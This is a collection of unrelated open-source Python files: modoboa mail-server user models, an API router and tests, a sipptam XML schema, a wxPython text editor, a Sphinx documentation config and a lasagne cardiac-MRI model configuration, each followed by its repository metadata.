help_text=ugettext_lazy(
"Allow this administrator to access user mailboxes"
)
)
password = models.CharField(ugettext_lazy("password"), max_length=256)
language = models.CharField(
ugettext_lazy("language"),
max_length=10, default="en", choices=constants.LANGUAGES,
help_text=ugettext_lazy(
"Prefered language to display pages."
)
)
phone_number = PhoneNumberField(
ugettext_lazy("Phone number"), blank=True, null=True)
secondary_email = models.EmailField(
ugettext_lazy("Secondary email"), max_length=254,
blank=True, null=True,
help_text=ugettext_lazy(
"An alternative e-mail address, can be used for recovery needs.")
)
tfa_enabled = models.BooleanField(default=False)
_parameters = jsonfield.JSONField(default={})
class Meta(object):
ordering = ["username"]
index_together = [
["email", "is_active"]
]
password_expr = re.compile(r'\{([\w\-]+)\}(.+)')
def __init__(self, *args, **kwargs):
"""Load parameter manager."""
super(User, self).__init__(*args, **kwargs)
self.parameters = param_tools.Manager("user", self._parameters)
def _crypt_password(self, raw_value):
"""Crypt the local password using the appropriate scheme.
In case we don't find the scheme (for example when the
management framework is used), we load the parameters and try
one more time.
"""
scheme = param_tools.get_global_parameter(
"password_scheme", raise_exception=False)
if scheme is None:
from modoboa.core.apps import load_core_settings
load_core_settings()
scheme = param_tools.get_global_parameter(
"password_scheme", raise_exception=False)
raw_value = smart_bytes(raw_value)
return get_password_hasher(scheme.upper())().encrypt(raw_value)
def set_password(self, raw_value, curvalue=None):
"""Password update
Update the current mailbox's password with the given clear
value. This value is encrypted according to the defined method
before it is saved.
:param raw_value: the new password's value
:param curvalue: the current password (for LDAP authentication)
"""
ldap_sync_enable = param_tools.get_global_parameter("ldap_enable_sync")
if self.is_local or ldap_sync_enable:
self.password = self._crypt_password(raw_value)
else:
if not ldap_available:
raise InternalError(
_("Failed to update password: LDAP module not installed")
)
LDAPAuthBackend().update_user_password(
self.username, curvalue, raw_value
)
signals.account_password_updated.send(
sender=self.__class__,
account=self, password=raw_value, created=self.pk is None)
def check_password(self, raw_value):
"""Compare raw_value to current password."""
match = self.password_expr.match(self.password)
if match is None:
return False
raw_value = force_str(raw_value)
scheme = match.group(1)
val2 = match.group(2)
hasher = get_password_hasher(scheme)
return hasher().verify(raw_value, val2)
def __str__(self):
return smart_text(self.get_username())
def get_absolute_url(self):
"""Return detail url for this user."""
return reverse("admin:account_detail", args=[self.pk])
@property
def type(self):
return "account"
@property
def tags(self):
return [{"name": "account", "label": _("account"), "type": "idt"},
{"name": self.role, "label": self.role,
"type": "grp", "color": "info"}]
@property
def fullname(self):
result = self.username
if self.first_name != "":
result = self.first_name
if self.last_name != "":
if result != "":
result += " "
result += self.last_name
return result
@property
def identity(self):
return self.username
@property
def name_or_rcpt(self):
if self.first_name != "":
return "%s %s" % (self.first_name, self.last_name)
return "----"
@property
def enabled(self):
return self.is_active
@property
def encoded_address(self):
if self.first_name != "" or self.last_name != "":
return '"{}" <{}>'.format(
Header(self.fullname, "utf8").encode(), self.email)
return self.email
def is_owner(self, obj):
"""Tell is the user is the unique owner of this object
:param obj: an object inheriting from ``models.Model``
:return: a boolean
"""
ct = ContentType.objects.get_for_model(obj)
try:
ooentry = self.objectaccess_set.get(
content_type=ct, object_id=obj.id)
except ObjectAccess.DoesNotExist:
return False
return ooentry.is_owner
def can_access(self, obj):
"""Check if the user can access a specific object
This function is recursive: if the given user hasn't got
direct access to this object and if he has got access to other
``User`` objects, we check if one of those users owns the
object.
        :param obj: an admin object
:return: a boolean
"""
if self.is_superuser:
return True
ct = ContentType.objects.get_for_model(obj)
try:
ooentry = self.objectaccess_set.get(
content_type=ct, object_id=obj.id)
except ObjectAccess.DoesNotExist:
pass
else:
return True
if ct.model == "user":
return False
ct = ContentType.objects.get_for_model(self)
qs = self.objectaccess_set.filter(content_type=ct)
for ooentry in qs.all():
if ooentry.content_object.is_owner(obj):
return True
return False
@property
def role(self):
"""Return user role."""
if not hasattr(self, "_role"):
if self.is_superuser:
self._role = "SuperAdmins"
else:
try:
self._role = self.groups.all()[0].name
except IndexError:
self._role = "---"
return self._role
@role.setter
def role(self, role):
"""Set administrative role for this account
:param string role: the role to set
"""
if role is None or self.role == role:
return
signals.account_role_changed.send(
sender=self.__class__, account=self, role=role)
self.groups.clear()
if role == "SuperAdmins":
self.is_superuser = True
else:
if self.is_superuser or role == "SimpleUsers":
ObjectAccess.objects.filter(user=self).delete()
self.is_superuser = False
try:
self.groups.add(Group.objects.get(name=role))
except Group.DoesNotExist:
self.groups.add(Group.objects.get(name="SimpleUsers"))
if role != "SimpleUsers" and not self.can_access(self):
from modoboa.lib.permissions import grant_access_to_object
grant_access_to_object(self, self)
self.save()
self._role = role
def get_role_display(self):
"""Return the display name of this role."""
for role in constants.ROLES:
if role[0] == self.role:
return role[1]
return _("Unknown")
@cached_property
def is_admin(self):
"""Shortcut to check if user is administrator."""
return self.role in constants.ADMIN_GROUPS
def post_create(self, creator):
"""Grant permission on this user to creator."""
from modoboa.lib.permissions import grant_access_to_object
grant_access_to_object(creator, self, is_owner=True)
def save(self, *args, **kwargs):
creator = kwargs.pop("creator", None)
super(User, self).save(*args, **kwargs)
if creator is not None:
self.post_create(creator)
def from_csv(self, user, row, crypt_password=True):
"""Create a new account from a CSV file entry.
The expected order is the following::
"account", loginname, password, first name, last name, enabled, role
Additional fields can be added using the *account_imported* signal.
:param user: a ``core.User`` instance
:param row: a list containing the expected information
:param crypt_password:
"""
from modoboa.lib.permissions import get_account_roles
if len(row) < 7:
raise BadRequest(_("Invalid line"))
desired_role = row[6].strip()
if not user.is_superuser:
allowed_roles = get_account_roles(user)
allowed_roles = [role[0] for role in allowed_roles]
if desired_role not in allowed_roles:
raise PermDeniedException(_(
"You can't import an account with a role greater than "
"yours"
))
self.username = row[1].strip().lower()
try:
User.objects.get(username=self.username)
except User.DoesNotExist:
pass
else:
raise Conflict
if desired_role == "SimpleUsers":
if len(row) < 8 or not row[7].strip():
raise BadRequest(
_("The simple user '%s' must have a valid email address"
% self.username)
)
if self.username != row[7].strip():
raise BadRequest(
_("username and email fields must not differ for '%s'"
% self.username)
)
if crypt_password:
self.set_password(row[2].strip())
else:
self.password = row[2].strip()
self.first_name = row[3].strip()
self.last_name = row[4].strip()
self.is_active = (row[5].strip().lower() in ["true", "1", "yes", "y"])
self.language = settings.LANGUAGE_CODE
self.save()
self.role = desired_role
self.post_create(user)
if len(row) < 8:
return
signals.account_imported.send(
sender=self.__class__, user=user, account=self, row=row[7:])
def to_csv(self, csvwriter):
"""Export this account.
The CSV format is used to export.
:param csvwriter: csv object
"""
row = [
"account",
smart_text(self.username),
smart_text(self.password),
smart_text(self.first_name),
smart_text(self.last_name),
smart_text(self.is_active),
smart_text(self.role),
smart_text(self.email)
]
results = signals.account_exported.send(
sender=self.__class__, user=self)
for result in results:
row += result[1]
csvwriter.writerow(row)
reversion.register(User)
def populate_callback(user, group="SimpleUsers"):
"""Populate callback
If the LDAP authentication backend is in use, this callback will
    be called each time a new user authenticates successfully to
    Modoboa. This function is in charge of creating the mailbox
    associated with the provided ``User`` object.
:param user: a ``User`` instance
"""
from modoboa.lib.permissions import grant_access_to_object
sadmins = User.objects.filter(is_superuser=True)
user.role = group
user.post_create(sadmins[0])
for su in sadmins[1:]:
grant_access_to_object(su, user)
signals.account_auto_created.send(
sender="populate_callback", user=user)
class ObjectAccess(models.Model):
user = models.ForeignKey(User, on_delete=models.CASCADE)
content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)
object_id = models.PositiveIntegerField()
content_object = GenericForeignKey("content_type", "object_id")
is_owner = models.BooleanField(default=False)
class Meta(object):
unique_together = (("user", "content_type", "object_id"),)
def __str__(self):
return "%s => %s (%s)" % (
self.user, self.content_object, self.content_type
)
class Log(models.Model):
"""Simple log in database."""
date_created = models.DateTimeField(auto_now_add=True)
message = models.TextField()
level = models.CharField(max_length=15)
logger = models.CharField(max_length=30)
class LocalConfig(models.Model):
"""Store instance configuration here."""
api_pk = models.PositiveIntegerField(null=True)
site = models.ForeignKey("sites.Site", on_delete=models.CASCADE)
# API results cache
api_versions = jsonfield.JSONField()
_parameters = jsonfield.JSONField(default={})
# Dovecot LDAP update
need_dovecot_update = models.BooleanField(default=False)
def __init__(self, *args, **kwargs):
"""Load parameter manager."""
super(LocalConfig, self).__init__(*args, **kwargs)
self.parameters = param_tools.Manager("global", self._parameters)
class ExtensionUpdateHistory(models.Model):
"""Keeps track of update notifications."""
extension = models.CharField(max_length=100)
version = models.CharField(max_length=30)
class Meta:
unique_together = [("extension", "version")]
def __str__(self):
return "{}: {}".format(self.extension, self.name)
|
modoboa/modoboa
|
modoboa/core/models.py
|
Python
|
isc
| 15,574
|
"""Admin API urls."""
from rest_framework import routers
from . import viewsets
router = routers.SimpleRouter()
router.register(r"domains", viewsets.DomainViewSet, basename="domain")
router.register(
r"domainaliases", viewsets.DomainAliasViewSet, basename="domain_alias")
router.register(r"accounts", viewsets.AccountViewSet, basename="account")
router.register(r"aliases", viewsets.AliasViewSet, basename="alias")
router.register(
r"senderaddresses", viewsets.SenderAddressViewSet, basename="sender_address")
urlpatterns = router.urls
|
modoboa/modoboa
|
modoboa/admin/api/v1/urls.py
|
Python
|
isc
| 548
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
sipptam.conf.Schema
~~~~~~~~~~~~~~~~~~~
Contains a basic XML schema to parse the input configuration file.
:copyright: (c) 2013 by luismartingil.
:license: See LICENSE_FILE.
"""
import StringIO
schema = StringIO.StringIO('''\
<?xml version="1.0" encoding="UTF-8"?>
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema" elementFormDefault="qualified">
<xs:element name="sipptam">
<xs:complexType>
<xs:sequence>
<xs:element name="tas" type="tasType" minOccurs="1" maxOccurs="unbounded"/>
<xs:element name="testrun" type="testrunType" minOccurs="1" maxOccurs="unbounded"/>
<xs:element name="config" type="configType" minOccurs="1" maxOccurs="unbounded"/>
<xs:element name="mod" type="modType" minOccurs="0" maxOccurs="unbounded"/>
<xs:element name="advanced" type="advancedType" minOccurs="1" maxOccurs="1"/>
</xs:sequence>
<xs:attribute name="duthost" type="xs:string" use="required"/>
<xs:attribute name="dutport" type="xs:positiveInteger" use="required"/>
</xs:complexType>
</xs:element>
<xs:complexType name="tasType">
<xs:attribute name="host" type="IPType" use="required"/>
<xs:attribute name="port" type="xs:string" use="required"/>
<xs:attribute name="jobs" type="xs:positiveInteger" use="required"/>
</xs:complexType>
<xs:complexType name="testrunType">
<xs:attribute name="id" type="xs:string" use="required"/>
<xs:attribute name="scenarioPath" type="xs:string" use="required"/>
<xs:attribute name="configlink" type="xs:string" use="required"/>
<xs:attribute name="modlink" type="xs:string"/>
</xs:complexType>
<xs:complexType name="configType">
<xs:attribute name="id" type="xs:string" use="required"/>
<xs:attribute name="ratio" type="numberListType" use="required"/>
<xs:attribute name="max" type="numberListType" use="required"/>
<xs:attribute name="pause" type="positiveFloat" use="required"/>
<xs:attribute name="tries" type="xs:positiveInteger" use="required"/>
</xs:complexType>
<xs:complexType name="modType">
<xs:sequence>
<xs:element name="replace" type="replaceType" minOccurs="0" maxOccurs="unbounded"/>
<xs:element name="injection" type="injectionType" minOccurs="0" maxOccurs="unbounded"/>
</xs:sequence>
<xs:attribute name="id" type="xs:string" use="required"/>
</xs:complexType>
<xs:complexType name="replaceType">
<xs:attribute name="regex" type="xs:string" use="required"/>
<xs:attribute name="src" type="xs:string" use="required"/>
<xs:attribute name="dst" type="xs:string" use="required"/>
</xs:complexType>
<xs:complexType name="injectionType">
<xs:attribute name="regex" type="xs:string" use="required"/>
<xs:attribute name="path" type="xs:string" use="required"/>
</xs:complexType>
<xs:complexType name="advancedType">
<xs:attribute name="execMode" type="execModeType" use="required"/>
<xs:attribute name="scenarioValidate" type="myBoolType" use="required"/>
<xs:attribute name="regexValidate" type="myBoolType" use="required"/>
</xs:complexType>
<xs:simpleType name="numberListType">
<xs:restriction base="xs:string">
<xs:pattern value="([0-9]*)((;[0-9]+)*)?"/>
</xs:restriction>
</xs:simpleType>
<xs:simpleType name="execModeType">
<xs:restriction base="xs:string">
<xs:enumeration value="serial"/>
<xs:enumeration value="parallel"/>
</xs:restriction>
</xs:simpleType>
<xs:simpleType name="IPType">
<xs:restriction base="xs:string">
<xs:pattern value="(([1-9]?[0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\.){3}([1-9]?[0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])"/>
</xs:restriction>
</xs:simpleType>
<xs:simpleType name="anyOrIPType">
<xs:restriction base="xs:string">
<xs:pattern value="((([1-9]?[0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\.){3}([1-9]?[0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5]))|(\*)"/>
</xs:restriction>
</xs:simpleType>
<xs:simpleType name="positiveFloat">
<xs:restriction base="xs:float">
<xs:minInclusive value="0.0"/>
</xs:restriction>
</xs:simpleType>
<xs:simpleType name="myBoolType">
<xs:restriction base="xs:string">
<xs:enumeration value="True"/>
<xs:enumeration value="False"/>
</xs:restriction>
</xs:simpleType>
</xs:schema>
''')
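# Editor's sketch (not part of sipptam): validating a configuration file
# against the schema above with lxml, an assumed dependency.
def _example_validate(config_path='sipptam.xml'):
    from lxml import etree
    xsd = etree.XMLSchema(etree.parse(schema))   # consumes the StringIO once
    doc = etree.parse(config_path)
    xsd.assertValid(doc)    # raises DocumentInvalid if the config is bad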
|
halitalptekin/sipptam
|
src/sipptam/validate/Schema.py
|
Python
|
isc
| 4,705
|
import wx
import os.path
class MainWindow( wx.Frame ):
def __init__( self, filename = '*.txt' ):
super( MainWindow, self ).__init__( None, size = ( 800,640 ) )
self.filename = filename
self.dirname = '.'
self.panel = wx.Panel( self, -1 )
self.CreateInteriorWindowComponents()
sizer = wx.BoxSizer()
sizer.Add( self.multiText, proportion = 1, flag = wx.CENTER|wx.EXPAND )
self.panel.SetSizer( sizer )
self.CreateExteriorWindowComponents()
self.multiText.Bind( wx.EVT_KEY_UP, self.updateLineCol )
self.multiText.Bind( wx.EVT_LEFT_DOWN, self.updateLineCol )
def CreateInteriorWindowComponents( self ):
self.multiText = wx.TextCtrl( self.panel, style = wx.TE_MULTILINE )
def updateLineCol( self, event ):
        col, row = self.multiText.PositionToXY( self.multiText.GetInsertionPoint() )
        stat = "col=%s, row=%s" % ( col, row )
self.StatusBar.SetStatusText( stat, number = 0 )
event.Skip()
def CreateExteriorWindowComponents( self ):
self.CreateMenu()
self.CreateStatusBar()
self.SetTitle()
def CreateMenu( self ):
fileMenu = wx.Menu()
for id, label, helpText, handler in \
[( wx.ID_OPEN, '&Open', 'Open a new file', self.OnOpen ),
( wx.ID_SAVE, '&Save', 'Save the current file', self.OnSave ),
( wx.ID_SAVEAS, 'Save &As', 'Save the file under a different name',
self.OnSaveAs ),
( None, None, None, None ),
( wx.ID_EXIT, 'E&xit', 'Terminate the program', self.OnExit )]:
if id == None:
fileMenu.AppendSeparator()
else:
item = fileMenu.Append( id, label, helpText )
self.Bind( wx.EVT_MENU, handler, item )
editMenu = wx.Menu()
for id, label, helpText, handler in \
[( wx.ID_COPY, '&Copy', 'Copy selected text', self.OnCopy ),
( wx.ID_PASTE, '&Paste', 'Paste clipboard text', self.OnPaste )]:
if id == None:
editMenu.AppendSeparator()
else:
item = editMenu.Append( id, label, helpText )
self.Bind( wx.EVT_MENU, handler, item )
aboutMenu = wx.Menu()
for id, label, helpText, handler in \
[( wx.ID_ABOUT, '&About', 'Information about this program',
self.OnAbout )]:
if id == None:
aboutMenu.AppendSeparator()
else:
item = aboutMenu.Append( id, label, helpText )
self.Bind( wx.EVT_MENU, handler, item )
menuBar = wx.MenuBar()
menuBar.Append( fileMenu, '&File' ) # Add the fileMenu to the MenuBar
menuBar.Append( editMenu, '&Edit' )
menuBar.Append( aboutMenu, '&About' )
self.SetMenuBar( menuBar ) # Add the menuBar to the Frame
def SetTitle( self ):
super( MainWindow, self ).SetTitle( 'ATE %s'%self.filename )
# helper methods
def defaultFileDialogOptions( self ):
return dict( message = 'Choose a file', defaultDir = self.dirname,
wildcard = '*.*' )
def askUserForFilename (self, **dialogOptions ):
dialog = wx.FileDialog( self, **dialogOptions )
if dialog.ShowModal() == wx.ID_OK:
userProvidedFilename = True
self.filename = dialog.GetFilename()
self.dirname = dialog.GetDirectory()
self.SetTitle()
else:
userProvidedFilename = False
dialog.Destroy()
return userProvidedFilename
# event handlers
def OnAbout( self, event ):
dialog = wx.MessageDialog( self, 'A sample editor\n'
'in wxPython', 'About Sample Editor', wx.OK )
dialog.ShowModal()
dialog.Destroy()
def OnExit( self, event ):
self.Close()
def OnSave( self, event ):
if os.path.exists( self.filename ):
self.OnSaveFile( event )
else:
self.OnSaveAs( event )
def OnOpen( self, event ):
if self.askUserForFilename( style = wx.OPEN, **self.defaultFileDialogOptions() ):
textfile = open( os.path.join( self.dirname, self.filename ), 'r' )
self.multiText.SetValue( textfile.read() )
textfile.close()
def OnSaveFile( self, event ):
textfile = open( os.path.join( self.dirname, self.filename ), 'w' )
textfile.write( self.multiText.GetValue() )
textfile.close()
def OnSaveAs( self, event ):
if self.askUserForFilename( defaultFile = self.filename, style = wx.SAVE,
**self.defaultFileDialogOptions() ):
self.OnSaveFile( event )
# clipboard functions, flush for other programs
def OnCopy( self, event ):
self.dataObj = wx.TextDataObject()
self.dataObj.SetText( self.multiText.GetStringSelection() )
if wx.TheClipboard.Open():
wx.TheClipboard.SetData( self.dataObj )
wx.TheClipboard.Flush()
else:
wx.MessageBox( "Unable to open the clipboard", "Error" )
def OnPaste( self, event ):
if wx.TheClipboard.Open():
dataObj = wx.TextDataObject()
success = wx.TheClipboard.GetData( dataObj )
wx.TheClipboard.Flush()
wx.TheClipboard.Close()
if not success: return
text = dataObj.GetText()
if text: self.multiText.WriteText( text )
app = wx.App()
frame = MainWindow()
frame.Show()
app.MainLoop()
|
mpjoseca/ate
|
src/editor.py
|
Python
|
isc
| 5,579
|
# -*- coding: utf-8 -*-
#
# sanpera documentation build configuration file, created by
# sphinx-quickstart2 on Sat May 12 21:24:07 2012.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'sanpera'
copyright = u'2012, Eevee'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1.0'
# The full version, including alpha/beta/rc tags.
release = '0.1.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'sanperadoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'sanpera.tex', u'sanpera Documentation',
u'Eevee', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'sanpera', u'sanpera Documentation',
[u'Eevee'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'sanpera', u'sanpera Documentation',
u'Eevee', 'sanpera', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
|
eevee/sanpera
|
doc/conf.py
|
Python
|
isc
| 7,742
|
from django.urls import reverse_lazy
from modoboa.lib.tests import ModoTestCase
class OpenAPITestCase(ModoTestCase):
openapi_schema_url = reverse_lazy('schema-v1-legacy')
def test_unauthorized(self):
self.client.logout()
response = self.client.get(self.openapi_schema_url)
self.assertEqual(response.status_code, 401)
def test_get_schema(self):
self.assertEqual(self.openapi_schema_url, "/docs/openapi.json")
response = self.client.get(self.openapi_schema_url)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.json()['info'], {
'title': "Modoboa API",
'version': "v1",
})
|
modoboa/modoboa
|
modoboa/core/api/v1/tests.py
|
Python
|
isc
| 699
|
"""Single slice vgg with normalised scale.
"""
import functools
import lasagne as nn
import numpy as np
import theano
import theano.tensor as T
import data_loader
import deep_learning_layers
import image_transform
import layers
import preprocess
import postprocess
import objectives
import theano_printer
import updates
import utils
# Random params
rng = np.random
take_a_dump = False # dump a lot of data in a pkl-dump file. (for debugging)
dump_network_loaded_data = False # dump the outputs from the dataloader (for debugging)
# Memory usage scheme
caching = None
# Save and validation frequency
validate_every = 50
validate_train_set = True
save_every = 20
restart_from_save = False
dump_network_loaded_data = False
# Training (schedule) parameters
# - batch sizes
batch_size = 8
sunny_batch_size = 4
batches_per_chunk = 8
num_epochs_train = 250
# - learning rate and method
base_lr = 0.0003
learning_rate_schedule = {
0: base_lr,
9*num_epochs_train/10: base_lr/10,
19*num_epochs_train/20: base_lr/100,
}
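# For reference: with num_epochs_train = 250, the keys above evaluate (Python 2
# integer division) to {0: 0.0003, 225: 3e-05, 237: 3e-06} -- a 10x learning
# rate drop at epoch 225 and a 100x drop at epoch 237.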
momentum = 0.9
build_updates = updates.build_adam_updates
# Preprocessing stuff
cleaning_processes = [
preprocess.set_upside_up,]
cleaning_processes_post = [
functools.partial(preprocess.normalize_contrast_zmuv, z=2)]
augmentation_params = {
"rotation": (-360, 360),
"shear": (0, 0),
"translation": (-8, 8),
"flip_vert": (0, 1),
"roll_time": (0, 0),
"flip_time": (0, 0),
}
patch_mm = 64
use_hough_roi = True
preprocess_train = functools.partial( # normscale_resize_and_augment has a bug
preprocess.preprocess_normscale,
normscale_resize_and_augment_function=functools.partial(
image_transform.normscale_resize_and_augment_2,
normalised_patch_size=(patch_mm, patch_mm)))
preprocess_validation = functools.partial(preprocess_train, augment=False)
preprocess_test = preprocess_train
sunny_preprocess_train = preprocess.sunny_preprocess_with_augmentation
sunny_preprocess_validation = preprocess.sunny_preprocess_validation
sunny_preprocess_test = preprocess.sunny_preprocess_validation
# Data generators
create_train_gen = data_loader.generate_train_batch
create_eval_valid_gen = functools.partial(data_loader.generate_validation_batch, set="validation")
create_eval_train_gen = functools.partial(data_loader.generate_validation_batch, set="train")
create_test_gen = functools.partial(data_loader.generate_test_batch, set=["validation", "test"])
def filter_samples(folders):
# don't use patients who don't have more than 6 slices
return [
folder for folder in folders
if data_loader.compute_nr_slices(folder) > 6]
# Input sizes
patch_px = 32
nr_slices = 22
data_sizes = {
"sliced:data:sax": (batch_size, nr_slices, 30, patch_px, patch_px),
"sliced:data:sax:locations": (batch_size, nr_slices),
"sliced:data:sax:is_not_padded": (batch_size, nr_slices),
"sliced:data:randomslices": (batch_size, nr_slices, 30, patch_px, patch_px),
"sliced:data:singleslice:difference:middle": (batch_size, 29, patch_px, patch_px),
"sliced:data:singleslice:difference": (batch_size, 29, patch_px, patch_px),
"sliced:data:singleslice": (batch_size, 30, patch_px, patch_px),
"sliced:data:ax": (batch_size, 30, 15, patch_px, patch_px),
"sliced:data:shape": (batch_size, 2,),
"sunny": (sunny_batch_size, 1, patch_px, patch_px)
# TBC with the metadata
}
# Objective
l2_weight = 0.000
l2_weight_out = 0.000
def build_objective(interface_layers):
# l2 regu on certain layers
l2_penalty = nn.regularization.regularize_layer_params_weighted(
interface_layers["regularizable"], nn.regularization.l2)
# build objective
return objectives.KaggleObjective(interface_layers["outputs"], penalty=l2_penalty)
# Testing
postprocess = postprocess.postprocess
test_time_augmentations = 100  # More augmentations, since we only use single slices
tta_average_method = lambda x: np.cumsum(utils.norm_geometric_average(utils.cdf_to_pdf(x)))
# nonlinearity putting a lower bound on its output
def lb_softplus(lb):
return lambda x: nn.nonlinearities.softplus(x) + lb
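# Note: softplus(x) = log(1 + exp(x)) is strictly positive, so e.g.
# lb_softplus(0.1)(x) always yields a value strictly greater than 0.1 --
# useful for sigma-style outputs that must stay above a floor.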
init = nn.init.Orthogonal()
rnn_layer = functools.partial(nn.layers.RecurrentLayer,
W_in_to_hid=init,
W_hid_to_hid=init,
b=nn.init.Constant(0.1),
nonlinearity=nn.nonlinearities.rectify,
hid_init=nn.init.Constant(0.),
backwards=False,
learn_init=True,
gradient_steps=-1,
grad_clipping=False,
unroll_scan=False,
precompute_input=False)
# Architecture
def build_model():
#################
# Regular model #
#################
input_size = data_sizes["sliced:data:sax"]
input_size_mask = data_sizes["sliced:data:sax:is_not_padded"]
input_size_locations = data_sizes["sliced:data:sax:locations"]
l0 = nn.layers.InputLayer(input_size)
lin_slice_mask = nn.layers.InputLayer(input_size_mask)
lin_slice_locations = nn.layers.InputLayer(input_size_locations)
    # PREPROCESS SLICES SEPARATELY
l0_slices = nn.layers.ReshapeLayer(l0, (batch_size * nr_slices, 30, patch_px, patch_px)) # (bxs, t, i, j)
subsample_factor = 2
l0_slices_subsampled = nn.layers.SliceLayer(l0_slices, axis=1, indices=slice(0, 30, subsample_factor))
nr_frames_subsampled = 30 / subsample_factor
    # PREPROCESS FRAMES SEPARATELY
l0_frames = nn.layers.ReshapeLayer(l0_slices_subsampled, (batch_size * nr_slices * nr_frames_subsampled, 1, patch_px, patch_px)) # (bxsxt, 1, i, j)
# downsample
downsample = lambda incoming: nn.layers.dnn.Pool2DDNNLayer(incoming, pool_size=(2,2), stride=(2,2), mode='average_inc_pad')
upsample = lambda incoming: nn.layers.Upscale2DLayer(incoming, scale_factor=2)
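    # Resolution pyramid: with patch_px = 32, the levels below operate on
    # 32x32 (d0), 16x16 (d1), 8x8 (d2) and 4x4 (d3) frames; each coarser level
    # is upsampled and concatenated back onto the next finer one.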
l0_frames_d0 = l0_frames
l0_frames_d1 = downsample(l0_frames_d0)
l0_frames_d2 = downsample(l0_frames_d1)
l0_frames_d3 = downsample(l0_frames_d2)
